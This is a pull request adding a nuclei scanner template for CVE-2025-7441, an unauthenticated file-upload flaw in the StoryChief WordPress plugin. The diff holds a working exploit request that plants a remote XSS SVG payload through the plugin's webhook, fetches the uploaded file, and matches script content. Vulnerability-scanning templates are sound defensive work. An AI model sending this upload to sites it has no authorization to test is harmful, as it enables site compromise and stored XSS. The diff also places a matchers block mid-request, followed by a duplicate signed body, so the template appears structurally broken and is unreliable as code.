### PR TITLE
Create CVE-2025-7441.yaml

### DIFF
--- a/http/cves/2025/CVE-2025-7441.yaml
+++ b/http/cves/2025/CVE-2025-7441.yaml
@@ -35,6 +35,20 @@ http:
         Host: {{Hostname}}
         Content-Type: application/json
 
+        {"meta":{"mac":"daf13b9e3014978beca90f51dd8a4050b2c389c42187c00c018cf2410f2f699a","event":"publish"},"data":{"featured_image":{"data":{"sizes":{"full":"https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg"}}}}}
+
+      - |
+        GET /wp-content/uploads/{{year}}/{{month}}/retool-xss.svg HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body_2, "alert(document.domain)") || contains(body_2, "<?xml version") || contains(body_2, "<script")'
+          - 'status_code_2 == 200'
+        condition: and
         {"meta":{"mac":"b20477bcffc8324e370b2548486b9c968b6d70e87862afa7a9a1a045bad44506","event":"publish"},"data":{"featured_image":{"data":{"sizes":{"full":"https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/retool-xss.svg"}}}}}
 
       - |


### PR DESCRIPTION
/#
/## Template / PR Information

The StoryChief plugin for WordPress is vulnerable to arbitrary file uploads in all versions up to, and including, 1.0.42. This vulnerability occurs through the /wp-json/storychief/webhook REST-API endpoint that does not have sufficient filetype validation. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.


- References:

https://plugins.trac.wordpress.org/browser/story-chief/trunk/includes/tools.php#L75
https://www.wordfence.com/threat-intel/vulnerabilities/id/979efaa4-10f1-4c7f-b4b0-5a41678c9d66?source=cve

### Template Validation

I've validated this template locally?
- [ ] YES



